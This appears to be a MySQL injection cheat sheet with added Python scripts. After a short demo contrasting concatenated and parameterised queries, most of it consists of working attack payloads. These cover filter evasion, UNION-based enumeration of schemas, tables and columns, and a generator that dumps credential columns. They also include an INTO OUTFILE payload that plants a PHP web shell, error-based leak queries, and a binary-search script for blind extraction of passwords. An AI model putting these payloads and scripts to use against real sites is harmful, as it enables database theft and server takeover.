MySQL injection summary
MySQL injection is the insertion of SQL fragments into web form submissions, query-string parameters, or other page request data so that the server ends up executing attacker-controlled SQL. In other words, it abuses an existing application to pass (malicious) SQL to the backend database engine: an attacker types SQL syntax into a site that has an injection flaw, and the database executes statements that differ from what the developer intended.
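The mechanism in one runnable example (added here; not code from the original page): a login check built by string formatting beside the parameterised version. SQLite is used only because it ships with Python; the quoting and comment syntax of the two payloads is the same in MySQL. The table and credentials are constructed for the demonstration.

```python
import sqlite3

# Constructed sample table for the demonstration (not data from the original page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return conn

def login_vulnerable(conn, user, password):
    """Builds the statement by string formatting: the input is parsed as SQL."""
    sql = "SELECT id FROM users WHERE name = '%s' AND password = '%s'" % (user, password)
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, user, password):
    """Parameterised query: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "s3cret"),          # legitimate login
                     ("admin", "x' OR '1'='1"),    # tautology in the password field
                     ("admin'-- ", "anything")]:   # comment out the password check
        print(repr(user), repr(pw),
              "vulnerable:", login_vulnerable(db, user, pw),
              "safe:", login_safe(db, user, pw))
```

The second payload turns the WHERE clause into `password = 'x' OR '1'='1'`, the third ends the statement after the user name and comments out the rest; both succeed only against the concatenated query.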
MySQL general injection (SELECT)
- Comments
#
/* ... */
-- (MySQL requires a space after the two dashes; # and -- run to the end of the line, /* */ can sit inside a statement)
- Whitespace substitutes (when spaces are filtered)
Use /**/, parentheses around expressions, or + (a URL-encoded space) instead of spaces; the MySQL parser also treats these URL-encoded control characters as whitespace:
%09 = horizontal tab
%0a = line feed, new line
%0b = vertical tab
%0c = form feed, new page
%0d = carriage return
- Display multiple values in one column
concat()
group_concat()
concat_ws()
- Related functions
system_user()
user()
current_user()
session_user()
database()
version() (MySQL-specific)
load_file() (MySQL-specific)
@@datadir
@@basedir (MySQL-specific)
@@version_compile_os
MySQL general injection statements
- View MySQL basic information
and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*
(char(32,58,32) is the separator " : " and 0x7c is "|", so the echoed column reads "| : user : database : version". The numbers are placeholders for the other columns of the original query; their count must match, and and 1=2 empties the original result so only the union row is shown.)
- Query database names
and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*
- Query table names
and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=0x<hex of database name> limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=0x<hex of database name>/*
- Query column names
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=0x<hex of table name> and table_schema=0x<hex of database name> limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=0x<hex of table name> and table_schema=0x<hex of database name>/*
(Writing the names as hex literals, e.g. 0x74657374 for "test", avoids quote characters, which are often filtered or escaped. The limit N,1 form walks the result one row at a time; group_concat() returns all rows in one field but is cut off at group_concat_max_len, 1024 bytes by default.)
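The enumeration chain above, turned into a payload generator as an added example (not code from the original page). It fills in the hex-encoded names the page leaves as placeholders and adds a final step that dumps the chosen columns; the column counts and the test/users names in the usage are assumed values.

```python
def hexlit(s: str) -> str:
    """Encode a string as a MySQL hex literal (0x...) so the payload needs no quotes."""
    return "0x" + s.encode("utf-8").hex()

def union_select(ncols: int, col: int, expr: str, tail: str = "") -> str:
    """Build 'and 1=2 union select 1,...,<expr>,...,N <tail>/*'.
    ncols is the column count of the original query (found beforehand with
    order by / union probing); col is the 1-based column the page echoes back."""
    if not 1 <= col <= ncols:
        raise ValueError("col must be between 1 and ncols")
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = expr
    return "and 1=2 union select " + ",".join(cols) + (" " + tail if tail else "") + "/*"

def basic_info(ncols, col):
    # concat_ws(' : ', '|', user, database, version), as in the page's first payload
    return union_select(ncols, col,
                        "concat_ws(char(32,58,32),0x7c,user(),database(),version())")

def schemas(ncols, col):
    return union_select(ncols, col, "group_concat(schema_name)",
                        "from information_schema.schemata")

def tables(ncols, col, db):
    return union_select(ncols, col, "group_concat(table_name)",
                        "from information_schema.tables where table_schema=%s" % hexlit(db))

def columns(ncols, col, db, table):
    return union_select(ncols, col, "group_concat(column_name)",
                        "from information_schema.columns where table_schema=%s and table_name=%s"
                        % (hexlit(db), hexlit(table)))

def dump(ncols, col, db, table, fields):
    """Final step: read the data itself. Fields of a row are joined with ':' (0x3a),
    rows are joined by group_concat (subject to group_concat_max_len)."""
    return union_select(ncols, col,
                        "group_concat(concat_ws(0x3a,%s))" % ",".join(fields),
                        "from %s.%s" % (db, table))

if __name__ == "__main__":
    # Assumed column counts and names, chosen for the demonstration.
    for p in (basic_info(7, 4), schemas(4, 2), tables(6, 5, "test"),
              columns(8, 5, "test", "users"),
              dump(4, 2, "test", "users", ["id", "name", "password"])):
        print(p)
```

Every generated payload is quote-free, so it survives filters that escape or strip single and double quotes; only the column count has to be right, which is why union_select refuses an echo column outside the range.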
- Determine whether the current user has the FILE (read/write) privilege
and (select count(*) from mysql.user)>0/*
and (select count(*) from mysql.user where file_priv='Y')>0/*
(Both tests need read access to mysql.user, which only privileged accounts have. The second must filter on file_priv='Y': a plain count(file_priv) is non-zero for every readable row whatever the value. Even with FILE, load_file() and INTO OUTFILE are confined to the directory named by secure_file_priv, which is set by default on MySQL 5.7 and later, and are disabled entirely when it is NULL.)
- Write a file with INTO OUTFILE
union select 1,2,3,load_file('d:/web/logo123.jpg'),5,6,7,8,9,10,11 into outfile 'd:/web/90team.php'/*
(Reads an uploaded image that carries PHP code and writes it back out as a .php file under the web root. Use forward slashes or doubled backslashes in the paths: a single backslash starts an escape sequence inside a MySQL string literal. The other columns' values are written around the file content, tab-separated, which does not matter as long as the <?php ... ?> block survives. INTO OUTFILE refuses to overwrite an existing file and obeys secure_file_priv.)
MySQL error-based injection
- and (select 1 from (select count(*),concat((select (Statement) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Replace (Statement) with the query whose single result you want to leak, e.g.: SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1
The value comes back inside the error "Duplicate entry '~'...'~1' for key 'group_key'": MySQL evaluates the GROUP BY key once to look up the group and again when inserting it, and rand(0) advances between the two calls, so the insert collides with a key that already exists. The grouped table needs at least three rows (information_schema.tables always has them), and the technique only works when the application shows database errors to the client.
- and 1=(select * from (select NAME_CONST((Statement),1),NAME_CONST((Statement),1)) as x)--
The derived table gets two columns with the same name, and the resulting "Duplicate column name" error contains the value. NAME_CONST() accepts only constant arguments, so (Statement) must be an expression such as version() or @@datadir, not a subquery; write the spaces as + when the payload travels in a URL.
- update web_ids set host='www.0x50sec.org' where id=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (Statement)),1,62)))a from information_schema.tables group by a)b);
- insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (Statement)),1,62)))a from information_schema.tables group by a)b)));
The same duplicate-key trick works from an UPDATE or INSERT injection point. The duplicate-entry message shows at most 64 characters of the key, hence substring(...,1,62) next to the rand digit; longer results are read in slices by moving the substring offset.
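Why floor(rand(0)*2) with GROUP BY throws a duplicate-key error at all is easiest to see in a simulation. The following is an added example, not code from the original page: it models MySQL's grouping temp table, in which the key expression is evaluated once for the lookup and once more for the insert. The sequence of floor(rand(0)*2) values is the deterministic one produced by the fixed seed on MySQL 5.x servers and is stated here as an assumption; the leaked string is constructed.

```python
# First values of floor(rand(0)*2) on a MySQL 5.x server. rand() with a fixed seed is
# deterministic, so the sequence is the same on every run. (Assumption for this
# simulation; the values are not taken from the original page.)
FLOOR_RAND0_TIMES_2 = [0, 1, 1, 0, 1, 1]

def leak_by_duplicate_key(leaked_value: str, rows: int, seq=FLOOR_RAND0_TIMES_2):
    """Simulate 'select count(*), concat(<leaked_value>, floor(rand(0)*2)) x ... group by x'.

    MySQL aggregates into a temporary table keyed by the GROUP BY expression. For each
    source row it evaluates the key to look the group up; if the group is absent it
    evaluates the expression a second time to insert it. rand(0) advances on every call,
    so the two evaluations can differ and the insert can hit a key that is already there.
    The server then fails with 'Duplicate entry ... for key', and the offending key,
    which carries the leaked value, is printed in the message.

    Returns (groups, error): the temp table and the error text, or None if it succeeded."""
    values = iter(seq)
    groups = {}
    try:
        for _ in range(rows):
            key = leaked_value + str(next(values))      # evaluation 1: lookup
            if key in groups:
                groups[key] += 1
                continue
            key = leaked_value + str(next(values))      # evaluation 2: insert
            if key in groups:
                return groups, "Duplicate entry '%s' for key 'group_key'" % key
            groups[key] = 1
    except StopIteration:                               # sequence exhausted: no collision
        pass
    return groups, None

if __name__ == "__main__":
    # With one or two source rows the query succeeds; from the third row on it fails
    # and the message ends in the leaked value followed by '1'.
    for n in (1, 2, 3):
        print(n, leak_by_duplicate_key("5.7.31-log", n))
```

The walk-through for three rows: row 1 looks up "...0", misses, and inserts "...1"; row 2 looks up "...1" and counts it; row 3 looks up "...0", misses, and tries to insert "...1" again. That is why the grouped table must have at least three rows, and why the leaked value in the error always ends in 1.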
MySQL boolean-based blind injection
- Use ASCII
AND ascii(substring((SELECT password FROM users where id=1),1,1))=49
(49 is "1". Step through the offset and the character code and watch whether the page renders as it does for a true condition. Comparing with > instead of = halves the remaining range on every request instead of testing one candidate at a time.)
- Use regular expressions
and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA='blind_sqli' AND table_name REGEXP '^[a-n]' LIMIT 0,1)
(True if some table in blind_sqli has a name starting with a letter from a to n; narrow the character class, then extend the prefix, e.g. '^a[a-n]', until the whole name is known.)
MySQL time-based blind injection
- 1170 union select if(substring(current,1,1)=char(119),benchmark(5000000,encode('msg','by 5 seconds')),null) from (select database() as current) as tbl
- UNION SELECT IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User='root'
(The answer is read from the response time: char(119) is "w", so the first query stalls only if the current database name starts with w, and 1170 stands for the injected parameter's normal value. BENCHMARK()'s delay depends on server speed, so calibrate the iteration count first; sleep(N), available since MySQL 5.0.12, gives a fixed delay and is the usual choice today. encode() was removed in MySQL 8.0, and mysql.user.Password was replaced by authentication_string in 5.7, so the second query needs adjusting on current servers.)
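Both blind variants above, boolean-based and time-based, reduce to the same oracle: one request answers one yes/no question about one character. The following added example (not code from the original page) drives that oracle with a binary search over the ASCII range, so each character costs 7 requests instead of up to 95 equality probes, and it emits the page's own payload in both its boolean and its sleep()-based form. The oracle is simulated against a constructed secret; the column and table names in the payloads are the page's own example, and the 0..127 range assumes a printable-ASCII secret (raise hi to 255 for binary data, since ascii() returns the first byte).

```python
# Simulated target. In a real engagement each ask() is one HTTP request, and the answer
# is read from the page content (boolean-based) or from the response time (time-based).
# The secret is constructed for the demonstration and is not from the original page.
class SimulatedTarget:
    def __init__(self, secret: str):
        self.secret = secret
        self.requests = 0

    def ask(self, pos: int, code: int) -> bool:
        """Answer 'ascii(substring(secret,pos,1)) > code'. Past the end of the string
        substring() returns '' and ascii('') is 0, which is what MySQL does too."""
        self.requests += 1
        c = ord(self.secret[pos - 1]) if pos <= len(self.secret) else 0
        return c > code

# The payloads the oracle above stands in for (names taken from the page's example).
def boolean_payload(pos: int, code: int) -> str:
    return ("AND ascii(substring((SELECT password FROM users WHERE id=1),%d,1))>%d"
            % (pos, code))

def time_payload(pos: int, code: int, seconds: int = 5) -> str:
    # sleep() (MySQL 5.0.12+) gives a fixed delay; BENCHMARK() depends on server load.
    return ("AND IF(ascii(substring((SELECT password FROM users WHERE id=1),%d,1))>%d,sleep(%d),0)"
            % (pos, code, seconds))

def extract(target: SimulatedTarget, max_len: int = 64) -> str:
    """Recover the string one character at a time with a binary search over 0..127:
    exactly 7 requests per character, plus 7 to detect the end of the string."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                # invariant: the character code lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if target.ask(pos, mid):   # code > mid
                lo = mid + 1
            else:                      # code <= mid
                hi = mid
        if lo == 0:                    # ascii('') == 0: we have walked past the end
            break
        out.append(chr(lo))
    return "".join(out)

if __name__ == "__main__":
    t = SimulatedTarget("s3cret")
    print(extract(t), t.requests)      # s3cret 49
    print(boolean_payload(1, 63))
    print(time_payload(1, 63))
```

For the time-based form, ask() would send time_payload() and return True when the response took at least the sleep() duration; a few baseline requests first tell you how much jitter the server adds, so that the threshold is set above it.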
Reference: pentestmonkey